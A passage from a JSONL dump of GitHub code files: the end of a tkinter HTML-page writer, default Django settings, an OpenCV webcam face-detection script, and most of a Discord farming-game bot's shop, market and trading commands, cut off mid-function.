= self.name.get()\n\n\t\t#create an html page with name\n\t\tf = open(name+'.html','w')\n\n\t\t#get the contents of the body entry box\n\t\tbody = self.content.get()\n\n\t\tmessage = \"\"\"<html>\n\t\t<body> \"\"\" + body + \"\"\"\n\t\t</body>\n\t\t</html>\"\"\"\n\n\t\t#write the selected contents of body into a html page\n\t\tf.write(message)\n\t\t\n\t\tf.close()\n\n\n\t\tconn = sqlite3.connect('webPages.db')\n\n\t\tc = conn.cursor()\n\n\t\tc.execute(\"CREATE TABLE IF NOT EXISTS webPages(content TEXT)\")\n\n\t\tc.execute(\"INSERT INTO webPages(content) VALUES (?)\", ([message]))\n\n\t\tconn.commit()\n\n\n\tdef querydatabase(self):\n\t\tconn = sqlite3.connect('webPages.db')\n\n\t\tc = conn.cursor()\n\n\t\tc.execute(\"SELECT * FROM webPages\")\n\n\t\tallData = c.fetchall()\n\n\t\t#delete all existing entries in the listbox\n\t\tself.webpageList.delete(0,END)\n\t\t\n\t\tfor row in allData:\n\t\t\tself.webpageList.insert(END, row)\n\n\t\tconn.commit()\n\n\tdef selectWebPage(self,selected):\n\n\t\t#Get the content from the listbox that is selected, this will return a tuple\n\t\t#Get the index of the selected item in the listbox \n\t\tselected = self.webpageList.get(self.webpageList.curselection())\n\n\t\t#create html page selected.html to store selected content \n\t\tf = open('selected.html','w')\n\t\t#write the contents of selected into a html page, this will be the 0 index of the returned tuple\n\t\tf.write(selected[0])\n\n\t\tf.close()\n\ndef main():\n\troot = makeWeb()\n\t\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"lingsitu1290/Python-Drills","sub_path":"tkinterdata1.py","file_name":"tkinterdata1.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2660678148","text":"from pathlib import Path\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'django-insecure-427d-n0b(!#fft6ucauq@!qqy37^ofk)-vd779w_yysh!(2bb_'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\nROOT_URLCONF = 'zhixue_webapi.urls'\n\nWSGI_APPLICATION = 'zhixue_webapi.wsgi.application'\n\nTIME_ZONE = 'Asia/Shanghai'\n","repo_name":"immoses648/zhixue_webapi","sub_path":"zhixue_webapi/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"20826371824","text":"#!/usr/bin/python3\n\nimport cv2\n# loading camera driver\ncap=cv2.VideoCapture(0)\nf=cv2.CascadeClassifier('humanface.xml')\ng=cv2.CascadeClassifier('eye.xml')\nprint(dir(f))\nwhile True:\n    y,x=cap.read() #take one shot\n    face=f.detectMultiScale(x)\n    #print(x)\n    print(face)\n    #print(x.shape)\n    for (fx,fy,fw,fh) in face:\n        cv2.rectangle(x,(fx,fy),(fx+fw,fy+fh),(0,0,255),4)\n        onlyface=x[fy:fy+fh,fx:fx+fw]\n        eye=g.detectMultiScale(onlyface)\n        for (ex,ey,ew,eh) in eye:\n            cv2.rectangle(onlyface,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n    cv2.imshow('adhoc',x/1257)\n    cv2.imshow('adhoc1',x)\n    #cv2.imshow('adhoc1',onlyface)\n    #cv2.imshow('adhoc1',x[0:200,50:400])\n    if cv2.waitKey(10) & 0xff == ord('q'):\n        break\n\n","repo_name":"redashu/AIwinter1920","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"70637752218","text":"import discord\nimport
datetime\nfrom contextlib import suppress\nfrom typing import Optional, Literal\n\nfrom core import game_items\nfrom core.game_user import UserNotifications\nfrom .util import views\nfrom .util import embeds as embed_util\nfrom .util.commands import FarmSlashCommand, FarmCommandCollection\n\n\nTRADES_COST_INCREASE_PER_SLOT = 7500\n\nPROFILE_ATTR_FARM_SLOTS = \"farm_slots\"\nPROFILE_ATTR_FACTORY_SLOTS = \"factory_slots\"\nPROFILE_ATTR_FACTORY_LEVEL = \"factory_level\"\nPROFILE_ATTR_STORE_SLOTS = \"store_slots\"\n\n\ndef check_if_upgrade_maxed(user_data, profile_attribute: str) -> bool:\n checks_for_maxed = {\n PROFILE_ATTR_FARM_SLOTS: lambda: user_data.farm_slots >= 30,\n PROFILE_ATTR_FACTORY_SLOTS: lambda: user_data.factory_slots >= 15,\n PROFILE_ATTR_FACTORY_LEVEL: lambda: user_data.factory_level >= 10,\n PROFILE_ATTR_STORE_SLOTS: lambda: user_data.store_slots >= 10\n }\n return checks_for_maxed[profile_attribute]()\n\n\nclass ShopCollection(FarmCommandCollection):\n \"\"\"\n Welcome to the town's marketplace! You have come to the right place for buying and selling\n stuff. Here you can view the prices of the things you can grow in your farm, sell your\n harvest to the global market or trade with other players in your neighborhood.\n There also are specialists who can help you to upgrade your property and gear or provide\n some special services - some locals call those services as \"boosters\".\n \"\"\"\n help_emoji: str = \"\\N{SHOPPING TROLLEY}\"\n help_short_description: str = \"Purchase upgrades. Sell items to the market or your friends\"\n\n def __init__(self, client) -> None:\n super().__init__(client, [ShopCommand, MarketCommand, TradesCommand], name=\"Shop\")\n\n\nclass ShopSource(views.AbstractPaginatorSource):\n def __init__(self, entries, section: str):\n super().__init__(entries, per_page=6)\n self.section = section\n\n async def format_page(self, page, view):\n fmt = \"\\n\\n\".join(\n f\"**[\\N{TRIDENT EMBLEM} {item.level}] {item.full_name}** - **{item.gold_price} \"\n f\"{view.command.client.gold_emoji} / farm tile** \\n\\N{SHOPPING TROLLEY} \"\n f\"Start growing in your farm: **/farm plant \\\"{item.name}\\\"**\"\n for item in page\n )\n return discord.Embed(\n title=f\"\\N{CONVENIENCE STORE} Shop: {self.section}\",\n color=discord.Color.from_rgb(70, 145, 4),\n description=fmt\n )\n\n\nclass MarketSource(views.AbstractPaginatorSource):\n def __init__(self, entries, section: str):\n super().__init__(entries, per_page=6)\n self.section = section\n\n async def format_page(self, page, view):\n next_refresh = datetime.datetime.now().replace(\n microsecond=0,\n second=0,\n minute=0\n ) + datetime.timedelta(hours=1)\n refresh_fmt = discord.utils.format_dt(next_refresh, style=\"t\")\n\n fmt = f\"\\N{ALARM CLOCK} Market prices are going to change at: **{refresh_fmt}**\\n\\n\"\n fmt += \"\\n\\n\".join(\n f\"**{item.full_name}** - Market is buying for: \"\n f\"**{item.gold_reward} {view.command.client.gold_emoji} / unit**\\n\"\n f\"\\N{SCALES} Sell to the market: **/market sell \\\"{item.name}\\\"**\"\n for item in page\n )\n return discord.Embed(\n title=f\"\\N{SCALES} Market: {self.section}\",\n color=discord.Color.from_rgb(255, 149, 0),\n description=fmt\n )\n\n\nclass TradesSource(views.AbstractPaginatorSource):\n def __init__(self, entries, server_name: str, own_trades: bool = False):\n super().__init__(entries, per_page=6)\n self.server_name = discord.utils.escape_markdown(server_name)\n self.own_trades = own_trades\n\n async def format_page(self, page, view):\n who = \"All\" 
if not self.own_trades else \"Your\"\n title = f\"\\N{HANDSHAKE} {who} trade offers in \\\"{self.server_name}\\\"\"\n embed = discord.Embed(title=title, color=discord.Color.from_rgb(229, 232, 21))\n\n embed.description = (\n f\"\\N{MAN IN TUXEDO} Welcome to the *\\\"{self.server_name}\\\"* trading hall! \"\n \"Here you can trade items with your friends!\\n\\N{SQUARED NEW} \"\n \"To create a new trade in this server, use the **/trades create** command\\n\\n\"\n )\n\n if not page:\n embed.description += (\n \"\\N{CROSS MARK} It's empty in here! There are only some cricket noises... \"\n \"\\N{CRICKET}\"\n )\n return embed\n\n for trade in page:\n item = view.command.items.find_item_by_id(trade['item_id'])\n\n if not self.own_trades:\n fmt = (\n f\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{EAR OF RICE} Seller: {trade['username']}\\n\"\n f\"\\N{SHOPPING TROLLEY} Buy: **/trades accept {trade['id']}**\"\n )\n else:\n fmt = f\"\\N{WASTEBASKET} Delete: **/trades delete {trade['id']}**\"\n\n gold_emoji = view.command.client.gold_emoji\n embed.add_field(\n name=f\"{item.full_name} x{trade['amount']} for {gold_emoji} {trade['price']}\",\n value=fmt,\n inline=False\n )\n\n return embed\n\n\nclass ShopCommand(FarmSlashCommand, name=\"shop\"):\n pass\n\n\nclass ShopUpgradesCommand(ShopCommand, name=\"upgrades\", parent=ShopCommand):\n pass\n\n\nclass ShopUpgradesViewCommand(\n ShopUpgradesCommand,\n name=\"view\",\n description=\"\\N{WHITE MEDIUM STAR} Lists all upgrades available for purchase\",\n parent=ShopUpgradesCommand\n):\n \"\"\"\n With this command you can see the upgrades available for you to purchase.
        \n \\N{ELECTRIC LIGHT BULB} For information about buying upgrades, please see\n **/help \"shop upgrades buy\"**.\n \"\"\"\n\n async def callback(self):\n user_data = self.user_data\n trades_cost = user_data.store_slots * TRADES_COST_INCREASE_PER_SLOT\n\n embed = discord.Embed(\n title=\"\\N{WHITE MEDIUM STAR} Upgrades shop\",\n description=\"\\N{BRICK} Purchase upgrades to make your game progression more dynamic!\",\n color=discord.Color.from_rgb(255, 162, 0)\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_FARM_SLOTS):\n embed.add_field(\n name=f\"{self.client.tile_emoji} Farm: Expand size\",\n value=(\n \"Plant more items at a time in your farm!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.farm_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{user_data.farm_slots + 1} farm tiles**\\n\"\n f\"\\N{MONEY BAG} Price: **1** {self.client.gem_emoji}\\n\\n\"\n \"\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"farm size\\\"**\"\n )\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_FACTORY_SLOTS):\n embed.add_field(\n name=\"\\N{FACTORY} Factory: Larger capacity\",\n value=(\n \"Queue more products for production in factory!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.factory_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{user_data.factory_slots + 1} factory capacity**\\n\"\n f\"\\N{MONEY BAG} Price: **1** {self.client.gem_emoji}\\n\\n\"\n \"\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"factory capacity\\\"**\"\n )\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_FACTORY_LEVEL):\n embed.add_field(\n name=\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{COOKING} Factory: Hire more workers\",\n value=(\n \"Make products in factory faster!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.factory_level * 5} \\N{RIGHTWARDS ARROW} \"\n f\"{(user_data.factory_level + 1) * 5}% faster production \"\n f\"speed**\\n\\N{MONEY BAG} Price: **1** {self.client.gem_emoji}\"\n \"\\n\\n\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"factory workers\\\"**\"\n )\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_STORE_SLOTS):\n embed.add_field(\n name=\"\\N{HANDSHAKE} Trading: More deals\",\n value=(\n \"Post more trade offers!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.store_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{user_data.store_slots + 1} maximum trades**\\n\"\n f\"\\N{MONEY BAG} Price: **{trades_cost}** {self.client.gold_emoji}\"\n \"\\n\\n\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"trade deals\\\"**\"\n )\n )\n\n await self.reply(embed=embed)\n\n\nclass ShopUpgradesBuyCommand(\n ShopUpgradesCommand,\n name=\"buy\",\n description=\"\\N{SHOPPING TROLLEY} Purchases an upgrade\",\n parent=ShopUpgradesCommand\n):\n \"\"\"\n Permanently upgrades some game feature property, resulting in unlocking new capabilities\n or even a new functionalities.
        \n \\N{ELECTRIC LIGHT BULB} For information about each individual upgrade, use the\n **/shop upgrades view** command.\n \"\"\"\n upgrade: Literal[\"farm size\", \"factory capacity\", \"factory workers\", \"trade deals\"] = \\\n discord.app.Option(description=\"The upgrade to perform\")\n\n async def reject_for_level(self, required_level: int):\n embed = embed_util.error_embed(\n title=\"\\N{LOCK} This upgrade is not available for you yet!\",\n text=(\n \"**This upgrade is for a feature that is not unlocked for your current level!**\\n\"\n \"The feature and this upgrade is going to be unlocked at level \"\n f\"\\N{TRIDENT EMBLEM} {required_level}.\"\n ),\n cmd=self\n )\n await self.reply(embed=embed)\n\n async def reject_for_being_maxed(self):\n embed = embed_util.error_embed(\n title=\"\\N{SHOOTING STAR} This upgrade is already maxed out!\",\n text=(\n \"**Woah! You have already maxed out this particular upgrade!** \\N{HUSHED FACE}\\n\"\n \"You will have to upgrade something else instead. Anyways, congratulations \"\n \"for your success! \\N{PERSON RAISING BOTH HANDS IN CELEBRATION}\"\n ),\n cmd=self\n )\n if not self.interaction.response.is_done():\n await self.reply(embed=embed)\n else:\n await self.edit(embed=embed, view=None)\n\n async def perform_upgrade(\n self,\n profile_attribute: str,\n title: str,\n description: str,\n item_description: str,\n price: int = 1,\n costs_gems: bool = True\n ):\n if check_if_upgrade_maxed(self.user_data, profile_attribute):\n return await self.reject_for_being_maxed()\n\n embed = embed_util.prompt_embed(\n title=f\"Purchase upgrade: \\\"{title}\\\"?\",\n text=(\n \"Are you sure that you want to purchase this upgrade? \"\n \"This is an expensive investment, so think ahead! \"\n \"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{BRIEFCASE}\"\n ),\n cmd=self\n )\n embed.add_field(name=\"\\N{WHITE MEDIUM STAR} Upgrade\", value=item_description)\n embed.add_field(name=\"\\N{BOOKS} Description\", value=description)\n currency_emoji = self.client.gem_emoji if costs_gems else self.client.gold_emoji\n embed.add_field(name=\"\\N{MONEY BAG} Price\", value=f\"**{price}** {currency_emoji}\")\n\n confirm = await views.ConfirmPromptView(\n self,\n initial_embed=embed,\n emoji=currency_emoji,\n label=\"Purchase this upgrade!\"\n ).prompt()\n\n if not confirm:\n return\n\n conn = await self.acquire()\n # Refetch user data, because user could have no money or be already maxed\n self.user_data = await self.users.get_user(self.author.id, conn=conn)\n if check_if_upgrade_maxed(self.user_data, profile_attribute):\n await self.release()\n return await self.reject_for_being_maxed()\n\n if costs_gems:\n if self.user_data.gems < price:\n await self.release()\n return await self.edit(\n embed=embed_util.no_gems_embed(cmd=self, cost=price),\n view=None\n )\n self.user_data.gems -= price\n else:\n if self.user_data.gold < price:\n await self.release()\n return await self.edit(\n embed=embed_util.no_money_embed(cmd=self, cost=price),\n view=None\n )\n self.user_data.gold -= price\n\n setattr(self.user_data, profile_attribute, getattr(self.user_data, profile_attribute) + 1)\n await self.users.update_user(self.user_data, conn=conn)\n await self.release()\n\n embed = embed_util.congratulations_embed(\n title=f\"Upgrade complete - {title}!\",\n text=(\n \"Congratulations on your **HUGE** investment! \\N{GRINNING FACE WITH STAR EYES}\\n\"\n \"This upgrade is going to help you a lot in the long term! Nice! 
\"\n \"\\N{CLAPPING HANDS SIGN}\"\n ),\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n async def upgrade_farm_size(self):\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_FARM_SLOTS,\n title=f\"{self.client.tile_emoji} Farm: Expand size\",\n description=\"Plant more items at a time in your farm!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.farm_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{self.user_data.farm_slots + 1} farm tiles**\"\n )\n )\n\n async def upgrade_factory_capacity(self):\n if self.user_data.level < 3:\n return await self.reject_for_level(3)\n\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_FACTORY_SLOTS,\n title=\"\\N{FACTORY} Factory: Larger capacity\",\n description=\"Queue more products for production in factory!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.factory_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{self.user_data.factory_slots + 1} factory capacity**\"\n )\n )\n\n async def upgrade_factory_workers(self):\n if self.user_data.level < 3:\n return await self.reject_for_level(3)\n\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_FACTORY_LEVEL,\n title=\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{COOKING} Factory: Hire more workers\",\n description=\"Make products in factory faster!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.factory_level * 5} \\N{RIGHTWARDS ARROW} \"\n f\"{(self.user_data.factory_level + 1) * 5}% faster production**\"\n )\n )\n\n async def upgrade_trade_deals(self):\n if self.user_data.level < 5:\n return await self.reject_for_level(5)\n\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_STORE_SLOTS,\n title=\"\\N{HANDSHAKE} Trading: More deals\",\n description=\"Post more trade offers!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.store_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{self.user_data.store_slots + 1} maximum trades**\"\n ),\n price=self.user_data.store_slots * TRADES_COST_INCREASE_PER_SLOT,\n costs_gems=False\n )\n\n async def callback(self):\n upgrade_methods = {\n \"farm size\": self.upgrade_farm_size,\n \"factory capacity\": self.upgrade_factory_capacity,\n \"factory workers\": self.upgrade_factory_workers,\n \"trade deals\": self.upgrade_trade_deals\n }\n await upgrade_methods[self.upgrade]()\n\n\nclass ShopBoostersCommand(ShopCommand, name=\"boosters\", parent=ShopCommand):\n _required_level: int = 7\n\n\nclass ShopBoostersViewCommand(\n ShopBoostersCommand,\n name=\"view\",\n description=\"\\N{UPWARDS BLACK ARROW} Lists all boosters available for purchase\",\n parent=ShopBoostersCommand\n):\n \"\"\"\n With this command you can see the boosters available for you to purchase.
        \n \\N{ELECTRIC LIGHT BULB} For information about buying boosters, please see\n **/help \"shop boosters buy\"**.\n \"\"\"\n\n async def callback(self):\n embed = discord.Embed(\n title=\"\\N{UPWARDS BLACK ARROW} Booster shop\",\n description=(\n \"Purchase boosters to speed up your overall game progression in various ways \"\n \"\\N{SUPERHERO}\"\n ),\n color=discord.Color.from_rgb(39, 128, 184)\n )\n\n for boost in self.items.all_boosts_by_id.values():\n embed.add_field(\n name=f\"{boost.emoji} {boost.name}\",\n value=(\n f\"{boost.info}\\n\"\n f\"\\N{SHOPPING TROLLEY} **/shop boosters buy \\\"{boost.name.lower()}\\\"**\"\n )\n )\n await self.reply(embed=embed)\n\n\nclass ShopBoostersBuyCommand(\n ShopBoostersCommand,\n name=\"buy\",\n description=\"\\N{SHOPPING TROLLEY} Purchases a booster\",\n parent=ShopBoostersCommand\n):\n \"\"\"\n Activates a booster. When running this command, you are going to be prompted to choose\n a boost duration and you will be able to view the corresponding prices for each duration.\n When buying a booster, that is already active, the duration will be extended.\n Booster prices are dynamically calculated based on various, your current progression related,\n factors such as your experience level.\n \"\"\"\n booster: str = discord.app.Option(description=\"The booster to activate\", autocomplete=True)\n\n async def autocomplete(self, options, focused):\n return discord.AutoCompleteResponse(self.booster_autocomplete(options[focused]))\n\n async def callback(self):\n booster = self.lookup_booster(self.booster)\n\n if booster.required_level > self.user_data.level:\n embed = embed_util.error_embed(\n title=\"\\N{LOCK} This booster is not available for you yet!\",\n text=(\n \"**This booster is used for a feature that is not unlocked for your current \"\n \"level!**\\nThe feature and this booster is going to be unlocked at level \"\n f\"\\N{TRIDENT EMBLEM} {booster.required_level}.\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n embed = embed_util.prompt_embed(\n title=f\"Activate the {booster.emoji} {booster.name} booster?\",\n text=(\n \"\\N{SHOPPING TROLLEY} **Are you sure that you want to purchase the \"\n f\"\\\"{booster.emoji} {booster.name}\\\" booster?\\nConfirm, by pressing a button \"\n \"with your desired boost duration.**\\n\\N{CLOCK FACE TEN OCLOCK} If you already \"\n \"have this boost active, buying again is going to extend your previous duration.\\n\"\n f\"\\N{OPEN BOOK} Booster description: *{booster.info}*\"\n ),\n cmd=self\n )\n embed.set_footer(text=f\"You have a total of {self.user_data.gold} gold coins\")\n\n options = (\n (\n \"\\N{MONEY BAG} 1 day price\",\n \"Activate for 1 day\",\n game_items.BoostDuration.ONE_DAY\n ),\n (\n \"\\N{MONEY BAG} 3 days price\",\n \"Activate for 3 days\",\n game_items.BoostDuration.THREE_DAYS\n ),\n (\n \"\\N{MONEY BAG} 7 days price\",\n \"Activate for 7 days\",\n game_items.BoostDuration.SEVEN_DAYS\n )\n )\n\n buttons = []\n for option in options:\n price = booster.get_boost_price(option[2], self.user_data)\n embed.add_field(name=option[0], value=f\"**{price}** {self.client.gold_emoji}\")\n buttons.append(views.OptionButton(\n option=option[2],\n style=discord.ButtonStyle.primary,\n emoji=self.client.gold_emoji,\n label=option[1]\n ))\n\n duration = await views.MultiOptionView(self, buttons, initial_embed=embed).prompt()\n if not duration:\n return\n\n actual_price = booster.get_boost_price(duration, self.user_data)\n\n conn = await self.acquire()\n # Refetch user data, because user could 
have no money after prompt\n user_data = await self.users.get_user(self.author.id, conn=conn)\n\n if actual_price > user_data.gold:\n await self.release()\n return await self.edit(\n embed=embed_util.no_money_embed(self, actual_price),\n view=None\n )\n\n user_data.gold -= actual_price\n await self.users.update_user(user_data, conn=conn)\n await self.release()\n\n partial_boost = game_items.PartialBoost(\n booster.id,\n datetime.datetime.now() + datetime.timedelta(seconds=duration.value)\n )\n await self.user_data.give_boost(self, partial_boost)\n\n embed = embed_util.success_embed(\n title=\"Booster successfully activated!\",\n text=(\n f\"You activated the **{booster.emoji} {booster.name}** booster! \"\n \"Have fun! \\N{SUPERHERO}\"\n ),\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n\nclass ShopItemsCommand(\n ShopCommand,\n name=\"items\",\n description=\"\\N{CONVENIENCE STORE} Lists all items available for purchase\",\n parent=ShopCommand\n):\n \"\"\"With this command you can see all of the game items that you can ever purchase.\"\"\"\n _requires_account: bool = False\n\n category: Literal[\"crops\", \"trees and bushes\", \"animal products\"] = \\\n discord.app.Option(description=\"The category of items to view\")\n\n async def callback(self):\n class_per_category = {\n \"crops\": game_items.Crop,\n \"trees and bushes\": game_items.Tree,\n \"animal products\": game_items.Animal\n }\n item_class = class_per_category[self.category]\n\n await views.ButtonPaginatorView(\n self,\n source=ShopSource(\n entries=[item for item in self.items.all_items if isinstance(item, item_class)],\n section=f\"{item_class.inventory_emoji} {item_class.inventory_name}\"\n )\n ).start()\n\n\nclass MarketCommand(FarmSlashCommand, name=\"market\"):\n pass\n\n\nclass MarketViewCommand(\n MarketCommand,\n name=\"view\",\n description=\"\\N{SCALES} Lists all items available for selling\",\n parent=MarketCommand\n):\n \"\"\"\n With this command you can see all of the game items that you can ever sell.
        \n    \\N{ELECTRIC LIGHT BULB} For information about selling items, please see\n    **/help \"market sell\"**.\n    \"\"\"\n    _requires_account: bool = False\n\n    category: Literal[\n        \"crops\",\n        \"trees and bushes\",\n        \"animal products\",\n        \"factory products\",\n        \"other items\"\n    ] = discord.app.Option(description=\"The category of items to view\")\n\n    async def callback(self):\n        class_per_category = {\n            \"crops\": game_items.Crop,\n            \"trees and bushes\": game_items.Tree,\n            \"animal products\": game_items.Animal,\n            \"factory products\": game_items.Product,\n            \"other items\": game_items.Special\n        }\n        item_class = class_per_category[self.category]\n\n        await views.ButtonPaginatorView(\n            self,\n            source=MarketSource(\n                entries=[item for item in self.items.all_items if isinstance(item, item_class)],\n                section=f\"{item_class.inventory_emoji} {item_class.inventory_name}\"\n            )\n        ).start()\n\n\nclass MarketSellCommand(\n    MarketCommand,\n    name=\"sell\",\n    description=\"\\N{BANKNOTE WITH DOLLAR SIGN} Sells your items to the market\",\n    parent=MarketCommand\n):\n    \"\"\"\n    Sell your goodies to the game market. The price at which your items are sold is determined\n    by the in-game market price, which is updated every hour. The market price can be so low\n    that you might not profit from selling your items, or it can be so high that you might earn\n    a lot more than you spent for getting these items.
        \n \\N{ELECTRIC LIGHT BULB} To check the current market price for an item, you can use\n the **/market view** and **/items inspect** commands.\n \"\"\"\n item: str = discord.app.Option(description=\"Item to sell to the market\", autocomplete=True)\n amount: int = discord.app.Option(description=\"How many items to sell\", min=1, max=100_000)\n\n async def autocomplete(self, options, focused):\n return discord.AutoCompleteResponse(self.all_items_autocomplete(options[focused]))\n\n async def callback(self):\n item = self.lookup_item(self.item)\n\n if not isinstance(item, game_items.SellableItem):\n embed = embed_util.error_embed(\n title=\"This item cannot be sold to the market\",\n text=f\"Sorry, you can't sell **{item.full_name}** to our market!\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n async with self.acquire() as conn:\n item_data = await self.user_data.get_item(item.id, conn)\n\n if not item_data or item_data['amount'] < self.amount:\n return await self.reply(embed=embed_util.not_enough_items(self, item, self.amount))\n\n total_reward = item.gold_reward * self.amount\n\n embed = embed_util.prompt_embed(\n title=\"Please confirm market deal details\",\n text=\"So do you really want to sell these? Let me know if you approve\",\n cmd=self\n )\n embed.add_field(name=\"\\N{SCALES} Item\", value=f\"{self.amount}x {item.full_name}\")\n embed.add_field(name=f\"{self.client.gold_emoji} Price per unit\", value=item.gold_reward)\n embed.add_field(\n name=\"\\N{MONEY BAG} Total earnings\",\n value=f\"**{total_reward}** {self.client.gold_emoji}\"\n )\n\n confirm = await views.ConfirmPromptView(\n self,\n initial_embed=embed,\n emoji=self.client.gold_emoji,\n label=\"Sell items to the market\"\n ).prompt()\n\n if not confirm:\n return\n\n conn = await self.acquire()\n # Must refetch or users can exploit the long prompts and duplicate selling\n item_data = await self.user_data.get_item(item.id, conn)\n if not item_data or item_data['amount'] < self.amount:\n await self.release()\n embed = embed_util.not_enough_items(self, item, self.amount)\n return await self.edit(embed=embed, view=None)\n\n async with conn.transaction():\n await self.user_data.remove_item(item.id, self.amount, conn)\n self.user_data.gold += total_reward\n await self.users.update_user(self.user_data, conn=conn)\n await self.release()\n\n embed = embed_util.success_embed(\n title=\"Your items have been sold to the market! \\N{SCALES}\",\n text=(\n \"Thank you for selling these items to the market! \"\n \"\\N{SMILING FACE WITH SMILING EYES} We will be looking forward to working with \"\n f\"you again! You sold **{item.full_name} x{self.amount}** for **{total_reward} \"\n f\"{self.client.gold_emoji}**\"\n ),\n footer=f\"You now have {self.user_data.gold} gold coins!\",\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n\nclass TradesCommand(FarmSlashCommand, name=\"trades\"):\n _required_level: int = 5\n\n\nclass TradesListCommand(\n TradesCommand,\n name=\"list\",\n description=\"\\N{PAGE WITH CURL} Lists all active trades in this server\",\n parent=TradesCommand\n):\n \"\"\"\n Trades are a way to sell and buy items between players. Trade offers are created per\n server. You can post a limited amount of trade offers per server, but you can buy\n more trading slots with gold from the **/shop**.
        \n \\N{ELECTRIC LIGHT BULB} To create a trade offer, use the **/trades create** command.\n \"\"\"\n owned: Optional[bool] = discord.app.Option(\n description=\"Set to true, to only list your created trades\",\n default=False\n )\n\n async def callback(self):\n async with self.acquire() as conn:\n if not self.owned:\n query = \"SELECT * FROM store WHERE guild_id = $1;\"\n trades_data = await conn.fetch(query, self.guild.id)\n else:\n query = \"SELECT * FROM store WHERE guild_id = $1 AND user_id = $2;\"\n trades_data = await conn.fetch(query, self.guild.id, self.author.id)\n\n await views.ButtonPaginatorView(\n self,\n source=TradesSource(\n entries=trades_data,\n server_name=self.guild.name,\n own_trades=self.owned\n )\n ).start()\n\n\nclass TradesCreateCommand(\n TradesCommand,\n name=\"create\",\n description=\"\\N{SQUARED NEW} Creates a new trade offer\",\n parent=TradesCommand\n):\n \"\"\"\n This command posts a new trade offer in the Discord server you are currently in.\n When creating a trade offer, you have to specify the item you want to sell, the amount\n of items you want to sell, and the price you want to sell them for.\n When trade offer is created, the corresponding items are removed from your inventory.
        \n \\N{ELECTRIC LIGHT BULB} To view already posted trade offers in this server, use the\n **/trades list** command.\n \"\"\"\n item: str = discord.app.Option(description=\"Item to trade\", autocomplete=True)\n amount: int = discord.app.Option(description=\"How many items to trade\", min=1, max=2000)\n price: Literal[\"cheap\", \"average\", \"expensive\", \"very expensive\"] = \\\n discord.app.Option(description=\"Price for the items you want to sell\")\n\n async def autocomplete(self, options, focused):\n return discord.AutoCompleteResponse(self.all_items_autocomplete(options[focused]))\n\n async def callback(self):\n item = self.lookup_item(self.item)\n\n if not isinstance(item, game_items.MarketItem):\n embed = embed_util.error_embed(\n title=\"This item can't be traded!\",\n text=f\"Sorry, you can't trade **{item.full_name}** here!\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n conn = await self.acquire()\n item_data = await self.user_data.get_item(item.id, conn)\n if not item_data or item_data['amount'] < self.amount:\n await self.release()\n return await self.reply(embed=embed_util.not_enough_items(self, item, self.amount))\n\n base_min, base_max = item.min_market_price, item.max_market_price\n prices_map = {\n \"cheap\": lambda: base_min * self.amount,\n \"average\": lambda: int(((base_min + base_max) / 2) * self.amount),\n \"expensive\": lambda: base_max * self.amount,\n \"very expensive\": lambda: int((base_max * self.amount) * 1.25)\n }\n total_price = prices_map[self.price]()\n\n query = \"SELECT COUNT(*) FROM store WHERE user_id = $1 AND guild_id = $2;\"\n used_slots = await conn.fetchval(query, self.author.id, self.guild.id)\n if used_slots >= self.user_data.store_slots:\n await self.release()\n embed = embed_util.error_embed(\n title=\"You have reached maximum active trade offers in this server!\",\n text=(\n \"Oh no! We can't create this trade offer, because you already have used \"\n f\"**{used_slots} of your {self.user_data.store_slots}** available trading \"\n \"deals! \\N{BAR CHART}\\n\\n\"\n \"\\N{ELECTRIC LIGHT BULB} What you can do about this:\\na) Wait for someone \"\n \"to accept any of your current trades.\\nb) Delete some trades.\\n\"\n \"c) Upgrade your max. deal capacity with the \"\n \"**/shop upgrades buy \\\"trade deals\\\"** command.\"\n ),\n cmd=self\n )\n return await 